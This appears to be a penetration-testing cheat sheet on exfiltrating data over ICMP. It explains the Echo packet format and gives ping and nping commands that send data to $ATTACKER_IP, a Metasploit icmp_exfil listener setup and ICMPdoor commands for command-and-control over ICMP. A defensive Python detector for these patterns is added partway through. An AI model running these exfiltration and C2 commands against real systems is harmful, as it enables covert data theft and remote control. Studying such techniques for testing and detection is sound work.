# ICMP Exfiltration

* [ICMP Types](https://www.iana.org/assignments/icmp-parameters/icmp-parameters.xhtml)

* Type 0 (Echo Reply) contains an optional data field in the message, after the Identifier and Sequence Number fields
```
 0                   1                   2                   3  
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|      Type     |      Code     |            Checksum           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|           Identifier          |        Sequence Number        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                                                               |
+                              Data                             +
|                                                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```

## Usage

* The `-p` (pattern) option of `ping` can be used to pad the bytes. From the manual:
```
 -p pattern
           You may specify up to 16 “pad” bytes to fill out the packet you send. This is useful for diagnosing
           data-dependent problems in a network. For example, -p ff will cause the sent packet to be filled with all ones.
```

* Pad hex values
```sh
ping $TARGET_IP -c 1 -p $(echo "data payload" | xxd -p )
```

### Metasploit ICMP Exfiltration

* Listen for ICMP data on the attacker machine
```sh
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set interface <interface>
run
```

* Exfiltrate from the target via `ping` as shown above, or use `nping`
* With `nping`, start the transmission with a `BOF` marker and end it with `EOF`
```sh
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "BOFpayload.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "actual payload"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "EOF"
```
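
A defender-side check for the two techniques above, as an added example that is not part of the original page or of any tool it mentions: it flags Echo payloads that start with the `BOF`/`EOF` markers, unmarked messages sent between them, and payloads whose tail repeats a 2 to 16 byte unit, which is what a `ping -p` fill looks like. The function names, the sample addresses and the 16-byte timestamp offset (`TS_LEN`) are assumptions.

```python
import struct

TS_LEN = 16                 # assumption: ping's timestamp fills the first 16 data bytes
MARKERS = (b"BOF", b"EOF")  # transfer markers from the nping commands above

def echo(payload: bytes, icmp_type: int = 8) -> bytes:
    """Constructed sample: 8-byte Echo header (checksum left at 0) plus data."""
    return struct.pack("!BBHHH", icmp_type, 0, 0, 1, 1) + payload

def pad_unit(tail: bytes, max_len: int = 16):
    """Shortest unit of 2..max_len bytes whose repetition yields tail, else None."""
    for n in range(2, max_len + 1):
        if len(tail) >= 2 * n and all(b == tail[i % n] for i, b in enumerate(tail)):
            return tail[:n] if len(set(tail[:n])) > 1 else None  # ignore uniform fills (-p ff)
    return None

def inspect(msg: bytes) -> list:
    """Findings for one ICMP message (the bytes that follow the IP header)."""
    if len(msg) < 8 or msg[0] not in (0, 8):   # Echo Reply (0) / Echo Request (8) only
        return []
    data = msg[8:]
    findings = ["marker:" + data[:3].decode()] if data.startswith(MARKERS) else []
    unit = pad_unit(data[TS_LEN:])
    if unit:  # rotate back to data offset 0, where the fill is assumed to start
        n = len(unit)
        findings.append("pad-pattern:" + bytes(unit[(j - TS_LEN) % n] for j in range(n)).hex())
    return findings

def scan(packets) -> list:
    """packets: (src, icmp_bytes) in capture order; tracks BOF..EOF per source."""
    in_transfer, alerts = set(), []
    for src, msg in packets:
        found = inspect(msg)
        if not found and src in in_transfer:
            found = ["in-transfer"]          # unmarked message inside an open transfer
        if "marker:BOF" in found:
            in_transfer.add(src)
        if "marker:EOF" in found:
            in_transfer.discard(src)
        if found:
            alerts.append((src, found))
    return alerts

# Constructed sample capture: documentation addresses, made-up payloads.
PATTERN = b"data payload\n"   # the bytes `echo "data payload" | xxd -p` encodes
SAMPLE = [("192.0.2.10", echo(bytes(16) + bytes(range(0x10, 0x38)))),  # incrementing fill
          ("192.0.2.20", echo(bytes(16) + (PATTERN * 5)[16:56])),      # repeated pad pattern
          *[("192.0.2.30", echo(p)) for p in (b"BOFpayload.txt", b"actual payload", b"EOF")]]
```

`scan(SAMPLE)` returns alerts for the pattern-filled message and for all three marker-delimited messages, and none for the incrementing fill. A production rule would also expire the per-source state when no `EOF` arrives.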

### C2 over ICMP

* Use [krabelize's ICMPdoor](https://github.com/krabelize/icmpdoor)

* On target
```sh
sudo icmpdoor -i <interface> -d $ATTACKER_IP
```

* On attacker
```sh
sudo icmp-cnc -i <interface> -d $TARGET_IP
```